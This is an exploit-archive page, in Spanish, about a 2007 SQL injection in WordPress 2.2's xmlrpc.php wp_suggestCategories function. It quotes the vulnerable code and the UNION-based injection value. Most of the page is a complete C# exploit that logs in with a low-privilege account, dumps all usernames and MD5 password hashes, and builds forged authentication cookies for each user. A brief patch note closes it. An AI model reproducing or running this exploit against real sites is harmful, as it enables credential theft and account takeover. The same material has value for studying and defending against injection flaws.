Home / exploits wp22xmlrpc-sql.txt
Posted on 07 June 2007
/* El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this->escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $args[2]; $category = $args[3]; $max_results = $args[4]; if(!$this->login_pass_ok($username, $password)) { return($this->error); } // Only set a limit if one was provided. $limit = ""; if(!empty($max_results)) { $limit = "LIMIT {$max_results}"; } $category_suggestions = $wpdb->get_results(" SELECT cat_ID category_id, cat_name category_name FROM {$wpdb->categories} WHERE cat_name LIKE '{$category}%' {$limit} "); return($category_suggestions); } Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio vÃctima. Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. code c sharp: */ using System; using System.Net; using System.Text; using System.Xml; using System.Text.RegularExpressions; using System.Security.Cryptography; class Program { static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; string data = @"<methodCall> <methodName>wp.suggestCategories</methodName> <params> <param><value>1</value></param> <param><value>{0}</value></param> <param><value>{1}</value></param> <param><value>1</value></param> <param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param> </params> </methodCall>"; string cookieHash = GetCookieHash(targetUrl); using (WebClient request = new WebClient()) { /* Probar con el prefijo por omisión */ string response = request.UploadString(targetUrl + "xmlrpc.php", string.Format(data, login, password, "wp_svn_")); /* Se hace una nueva petición si la consulta anterior falla */ Match match = Regex.Match(response, @"FROMs+(.*?)categoriess+"); if (match.Success) { response = request.UploadString(targetUrl + "xmlrpc.php ", string.Format(data, login, password, match.Groups[1].Value)); } try { XmlDocument doc = new XmlDocument(); doc.LoadXml(response); XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null) { string user, pass; /* Mostrar lista de: * Usuario md5(contraseña) * Cookie de Autenticación * */ for (int i = 0; i < nodes.Count / 2 + 1; i += 2) { user = nodes.Item(i).InnerText; pass = nodes.Item(i + 1).InnerText; Console.WriteLine("Usuario: {0} MD5(Contraseña): {1}", user, pass); Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2} ", cookieHash, user, MD5(pass)); } } else { Console.WriteLine("Error: {0}", response); } } catch (Exception ex) { Console.WriteLine("Error: " + ex.ToString()); } } } private static string GetCookieHash(string targetUrl) { WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout"); request.Method = "HEAD"; (request as HttpWebRequest).AllowAutoRedirect = false; WebResponse response = request.GetResponse(); if (response != null) { Match match = Regex.Match(response.Headers["Set-Cookie"], @"wordpress[a-z]+_([a-zd]{32})", RegexOptions.IgnoreCase); if (match.Success) return match.Groups[1].Value; } return string.Empty; } public static string MD5(string password) { MD5CryptoServiceProvider x = new MD5CryptoServiceProvider(); byte[] bs = Encoding.UTF8.GetBytes(password); bs = x.ComputeHash(bs); StringBuilder s = new StringBuilder(); foreach (byte b in bs) { s.Append(b.ToString("x2").ToLower()); } return s.ToString(); } } /* Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la lÃnea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password. Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ] :: [Slappter] :: */